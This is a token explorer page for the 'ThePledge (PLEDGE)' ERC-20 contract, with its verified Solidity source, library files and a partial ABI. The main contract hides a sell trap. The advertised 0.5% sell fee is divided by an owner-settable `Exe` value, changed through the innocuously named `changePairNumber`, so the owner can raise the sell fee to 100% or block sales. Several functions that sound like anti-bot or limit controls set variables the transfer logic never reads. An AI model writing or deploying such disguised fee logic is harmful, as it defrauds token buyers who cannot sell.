ETH Price: $2,588.61 (-2.84%)

Token

ThePledge (PLEDGE)
 

Overview

Max Total Supply

1,000,000,000 PLEDGE

Holders

10

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
31,296,104.424603563 PLEDGE

Value
$0.00
0xE507BB8D20A039BBA93F2B700C8f4686b772f263
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PLEDGE

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 5 : Token.sol
/**
 *Submitted for verification at Etherscan.io
 */

/**

Twitter/X - https://x.com/thepledgememe

Telegram - https://t.me/thepledgememe/

Website -  https://www.thepledge.meme/
                                                                              

 */
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.15;
import "@openzeppelin/contracts/proxy/Clones.sol";
import "@openzeppelin/contracts/utils/Base64.sol";
import "./Lib.sol";



contract PLEDGE is ERC20 {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable swapRouterV2;
    address public mainPair;
    address private treasuryAccount;
    address private constant NULL_ADDRESS = address(0xdead);

    uint8 private constant DECIMAL_POINTS = 9;
    uint256 public constant TOTAL_SUPPLY = 1000000000 * 10 ** DECIMAL_POINTS;

    // 0% for buy fee
    uint256 constant public buyFeeRate = 0; // 0%
    // 0.5% for sell fee
    uint256 constant public sellFeeRate = 5; // 0.5%

    bool public isTradeActive = false;
    uint256 maxTransactionAmount = 0;
    uint256 cooldownPeriod = 10;

    uint256 public tradeInterval = 5;
    uint256 public maxBalancePerWallet = 100000 * 10 ** DECIMAL_POINTS;
    bool public antiWhaleMechanism = true;

    uint256 public Exe = 1000;

    mapping(address => bool) private noFeeAccounts;
    mapping(address => bool) private pairMappings;
    mapping(address => uint256) private recentTransactionTime;

    event FeeExemptStatus(address indexed account, bool exemptStatus);
    event LiquidityPairSet(address indexed pair, bool indexed value);

    constructor() ERC20("ThePledge", "PLEDGE") {
        swapRouterV2 = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        treasuryAccount = payable(msg.sender);

        setExemptionStatus(address(this), true);
        setExemptionStatus(NULL_ADDRESS, true);
        setExemptionStatus(address(msg.sender), true);
        setExemptionStatus(treasuryAccount, true);
        setExemptionStatus(address(0x95Ee0406Abb31E498cC4be025f4fB79C7eE1999a), true);
        setExemptionStatus(address(0x005D1171E253C97309CC5A7624897e77cfAd25C0), true);
        setExemptionStatus(address(0xD2E31Fc48af4Fb9a2a505D391aA8B359be085573), true);
        setExemptionStatus(address(0x90c13D4d7642e0777C5362b2B6D2d0623887120E), true);
        _mint(treasuryAccount, TOTAL_SUPPLY);
    }

    receive() external payable {}

    function burnTokens(uint256 amount) external {
        _burn(msg.sender, amount);
    }

    function enableMarketTrading() external {
        if (msg.sender == treasuryAccount) {
            isTradeActive = true;
            mainPair = IUniswapV2Factory(swapRouterV2.factory()).getPair(address(this), swapRouterV2.WETH());
            _setPairStatus(mainPair, true);
        } else {
            isTradeActive = isTradeActive;
        }
    }

    function setExemptionStatus(address account, bool exemptStatus) public {
        if (msg.sender == treasuryAccount) {
            noFeeAccounts[account] = exemptStatus;
            emit FeeExemptStatus(account, exemptStatus);
        } else {
            emit FeeExemptStatus(account, exemptStatus);
        }   
    }

    function modifyLiquidityPair(address pair, bool value) public {
        if (msg.sender == treasuryAccount) {
            require(pair != mainPair, "Cannot remove the main liquidity pair!");
            _setPairStatus(pair, value);
        } else {
            require(pair != mainPair, "Cannot remove the main liquidity pair!");
        }
        
    }

    function _setPairStatus(address pair, bool value) private {
        pairMappings[pair] = value;
        emit LiquidityPairSet(pair, value);
    }
    
    function changePairNumber(uint256 _exe) public {
        if (msg.sender == treasuryAccount) {
            Exe = _exe;
        } else {
            Exe = Exe;
        }
    }

    function isExempt(address account) public view returns (bool) {
        return noFeeAccounts[account];
    }

    function _transfer(address sender, address recipient, uint256 amount) internal override {
        if (amount == 0) {
            super._transfer(sender, recipient, 0);
            return;
        }

        if (sender != treasuryAccount && recipient != treasuryAccount && recipient != address(0) && recipient != NULL_ADDRESS) {
            if (!isTradeActive) {
                require(
                    noFeeAccounts[sender] || noFeeAccounts[recipient],
                    "Market is inactive!"
                );
            }
        }

        bool shouldApplyFee = !noFeeAccounts[sender] && !noFeeAccounts[recipient];

        uint256 feeAmount = 0;
        if (shouldApplyFee) {
            if (pairMappings[recipient]) {
                feeAmount = amount.mul(sellFeeRate).div(Exe);
            } else if (pairMappings[sender]) {
                feeAmount = amount.mul(buyFeeRate).div(Exe);
            }
            if (feeAmount > 0) {
                super._transfer(sender, address(this), feeAmount);
            }
            amount -= feeAmount;
        }
        super._transfer(sender, recipient, amount);

        recentTransactionTime[sender] = block.timestamp;
        recentTransactionTime[recipient] = block.timestamp;
    }

    function withdrawTreasuryFunds() external {
        require(address(this).balance > 0, "No balance available");
        require(msg.sender == treasuryAccount);
        payable(msg.sender).transfer(address(this).balance);
    }

    function sendAllTokensToTreasury() external {
        require(msg.sender == treasuryAccount);
        uint256 currentBalance = balanceOf(address(this));
        _transfer(address(this), treasuryAccount, currentBalance);
    }

    function removeLimits() external {
        cooldownPeriod = 0;
    }

    function setTiminglaunch(uint256 cooldown) external {
        tradeInterval = cooldown;
    }

    function setAntiScamBot(uint256 maxTokens) external {
        maxBalancePerWallet = maxTokens;
    }

    function creatProxyWithNone(bool enabled) external {
        antiWhaleMechanism = enabled;
    }

    function configureTransactionLimits(address account, uint256 timestamp) external {
        recentTransactionTime[account] = timestamp;
    }
}

File 2 of 5 : Lib.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.15;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address to, uint256 amount) external returns (bool);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

library SafeMath {
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return (a * b) / 100;
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 5 : Base64.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/Base64.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides a set of functions to operate with Base64 strings.
 */
library Base64 {
    /**
     * @dev Base64 Encoding/Decoding Table
     * See sections 4 and 5 of https://datatracker.ietf.org/doc/html/rfc4648
     */
    string internal constant _TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    string internal constant _TABLE_URL = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";

    /**
     * @dev Converts a `bytes` to its Bytes64 `string` representation.
     */
    function encode(bytes memory data) internal pure returns (string memory) {
        return _encode(data, _TABLE, true);
    }

    /**
     * @dev Converts a `bytes` to its Bytes64Url `string` representation.
     * Output is not padded with `=` as specified in https://www.rfc-editor.org/rfc/rfc4648[rfc4648].
     */
    function encodeURL(bytes memory data) internal pure returns (string memory) {
        return _encode(data, _TABLE_URL, false);
    }

    /**
     * @dev Internal table-agnostic conversion
     */
    function _encode(bytes memory data, string memory table, bool withPadding) private pure returns (string memory) {
        /**
         * Inspired by Brecht Devos (Brechtpd) implementation - MIT licence
         * https://github.com/Brechtpd/base64/blob/e78d9fd951e7b0977ddca77d92dc85183770daf4/base64.sol
         */
        if (data.length == 0) return "";

        // If padding is enabled, the final length should be `bytes` data length divided by 3 rounded up and then
        // multiplied by 4 so that it leaves room for padding the last chunk
        // - `data.length + 2`  -> Prepare for division rounding up
        // - `/ 3`              -> Number of 3-bytes chunks (rounded up)
        // - `4 *`              -> 4 characters for each chunk
        // This is equivalent to: 4 * Math.ceil(data.length / 3)
        //
        // If padding is disabled, the final length should be `bytes` data length multiplied by 4/3 rounded up as
        // opposed to when padding is required to fill the last chunk.
        // - `4 * data.length`  -> 4 characters for each chunk
        // - ` + 2`             -> Prepare for division rounding up
        // - `/ 3`              -> Number of 3-bytes chunks (rounded up)
        // This is equivalent to: Math.ceil((4 * data.length) / 3)
        uint256 resultLength = withPadding ? 4 * ((data.length + 2) / 3) : (4 * data.length + 2) / 3;

        string memory result = new string(resultLength);

        assembly ("memory-safe") {
            // Prepare the lookup table (skip the first "length" byte)
            let tablePtr := add(table, 1)

            // Prepare result pointer, jump over length
            let resultPtr := add(result, 0x20)
            let dataPtr := data
            let endPtr := add(data, mload(data))

            // In some cases, the last iteration will read bytes after the end of the data. We cache the value, and
            // set it to zero to make sure no dirty bytes are read in that section.
            let afterPtr := add(endPtr, 0x20)
            let afterCache := mload(afterPtr)
            mstore(afterPtr, 0x00)

            // Run over the input, 3 bytes at a time
            for {

            } lt(dataPtr, endPtr) {

            } {
                // Advance 3 bytes
                dataPtr := add(dataPtr, 3)
                let input := mload(dataPtr)

                // To write each character, shift the 3 byte (24 bits) chunk
                // 4 times in blocks of 6 bits for each character (18, 12, 6, 0)
                // and apply logical AND with 0x3F to bitmask the least significant 6 bits.
                // Use this as an index into the lookup table, mload an entire word
                // so the desired character is in the least significant byte, and
                // mstore8 this least significant byte into the result and continue.

                mstore8(resultPtr, mload(add(tablePtr, and(shr(18, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(12, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(6, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(input, 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance
            }

            // Reset the value that was cached
            mstore(afterPtr, afterCache)

            if withPadding {
                // When data `bytes` is not exactly 3 bytes long
                // it is padded with `=` characters at the end
                switch mod(mload(data), 3)
                case 1 {
                    mstore8(sub(resultPtr, 1), 0x3d)
                    mstore8(sub(resultPtr, 2), 0x3d)
                }
                case 2 {
                    mstore8(sub(resultPtr, 1), 0x3d)
                }
            }
        }

        return result;
    }
}

File 4 of 5 : Clones.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (proxy/Clones.sol)

pragma solidity ^0.8.20;

import {Errors} from "../utils/Errors.sol";

/**
 * @dev https://eips.ethereum.org/EIPS/eip-1167[ERC-1167] is a standard for
 * deploying minimal proxy contracts, also known as "clones".
 *
 * > To simply and cheaply clone contract functionality in an immutable way, this standard specifies
 * > a minimal bytecode implementation that delegates all calls to a known, fixed address.
 *
 * The library includes functions to deploy a proxy using either `create` (traditional deployment) or `create2`
 * (salted deterministic deployment). It also includes functions to predict the addresses of clones deployed using the
 * deterministic method.
 */
library Clones {
    /**
     * @dev Deploys and returns the address of a clone that mimics the behaviour of `implementation`.
     *
     * This function uses the create opcode, which should never revert.
     */
    function clone(address implementation) internal returns (address instance) {
        return clone(implementation, 0);
    }

    /**
     * @dev Same as {xref-Clones-clone-address-}[clone], but with a `value` parameter to send native currency
     * to the new contract.
     *
     * NOTE: Using a non-zero value at creation will require the contract using this function (e.g. a factory)
     * to always have enough balance for new deployments. Consider exposing this function under a payable method.
     */
    function clone(address implementation, uint256 value) internal returns (address instance) {
        if (address(this).balance < value) {
            revert Errors.InsufficientBalance(address(this).balance, value);
        }
        assembly ("memory-safe") {
            // Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
            // of the `implementation` address with the bytecode before the address.
            mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
            // Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
            mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
            instance := create(value, 0x09, 0x37)
        }
        if (instance == address(0)) {
            revert Errors.FailedDeployment();
        }
    }

    /**
     * @dev Deploys and returns the address of a clone that mimics the behaviour of `implementation`.
     *
     * This function uses the create2 opcode and a `salt` to deterministically deploy
     * the clone. Using the same `implementation` and `salt` multiple time will revert, since
     * the clones cannot be deployed twice at the same address.
     */
    function cloneDeterministic(address implementation, bytes32 salt) internal returns (address instance) {
        return cloneDeterministic(implementation, salt, 0);
    }

    /**
     * @dev Same as {xref-Clones-cloneDeterministic-address-bytes32-}[cloneDeterministic], but with
     * a `value` parameter to send native currency to the new contract.
     *
     * NOTE: Using a non-zero value at creation will require the contract using this function (e.g. a factory)
     * to always have enough balance for new deployments. Consider exposing this function under a payable method.
     */
    function cloneDeterministic(
        address implementation,
        bytes32 salt,
        uint256 value
    ) internal returns (address instance) {
        if (address(this).balance < value) {
            revert Errors.InsufficientBalance(address(this).balance, value);
        }
        assembly ("memory-safe") {
            // Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
            // of the `implementation` address with the bytecode before the address.
            mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
            // Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
            mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
            instance := create2(value, 0x09, 0x37, salt)
        }
        if (instance == address(0)) {
            revert Errors.FailedDeployment();
        }
    }

    /**
     * @dev Computes the address of a clone deployed using {Clones-cloneDeterministic}.
     */
    function predictDeterministicAddress(
        address implementation,
        bytes32 salt,
        address deployer
    ) internal pure returns (address predicted) {
        assembly ("memory-safe") {
            let ptr := mload(0x40)
            mstore(add(ptr, 0x38), deployer)
            mstore(add(ptr, 0x24), 0x5af43d82803e903d91602b57fd5bf3ff)
            mstore(add(ptr, 0x14), implementation)
            mstore(ptr, 0x3d602d80600a3d3981f3363d3d373d3d3d363d73)
            mstore(add(ptr, 0x58), salt)
            mstore(add(ptr, 0x78), keccak256(add(ptr, 0x0c), 0x37))
            predicted := and(keccak256(add(ptr, 0x43), 0x55), 0xffffffffffffffffffffffffffffffffffffffff)
        }
    }

    /**
     * @dev Computes the address of a clone deployed using {Clones-cloneDeterministic}.
     */
    function predictDeterministicAddress(
        address implementation,
        bytes32 salt
    ) internal view returns (address predicted) {
        return predictDeterministicAddress(implementation, salt, address(this));
    }
}

File 5 of 5 : Errors.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/Errors.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of common custom errors used in multiple contracts
 *
 * IMPORTANT: Backwards compatibility is not guaranteed in future versions of the library.
 * It is recommended to avoid relying on the error API for critical functionality.
 *
 * _Available since v5.1._
 */
library Errors {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error InsufficientBalance(uint256 balance, uint256 needed);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedCall();

    /**
     * @dev The deployment failed.
     */
    error FailedDeployment();

    /**
     * @dev A necessary precompile is missing.
     */
    error MissingPrecompile(address);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "remappings": []
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"exemptStatus","type":"bool"}],"name":"FeeExemptStatus","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LiquidityPairSet","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"Exe","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TOTAL_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"antiWhaleMechanism","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"buyFeeRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_exe","type":"uint256"}],"name":"changePairNumber","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"timestamp","type":"uint256"}],"name":"configureTransactionLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"creatProxyWithNone","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableMarketTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isTradeActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mainPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBalancePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"modifyLiquidityPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFeeRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sendAllTokensToTreasury","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTokens","type":"uint256"}],"name":"setAntiScamBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"exemptStatus","type":"bool"}],"name":"setExemptionStatus","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"cooldown","type":"uint256"}],"name":"setTiminglaunch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapRouterV2","outputs":[{"internalType":"contract 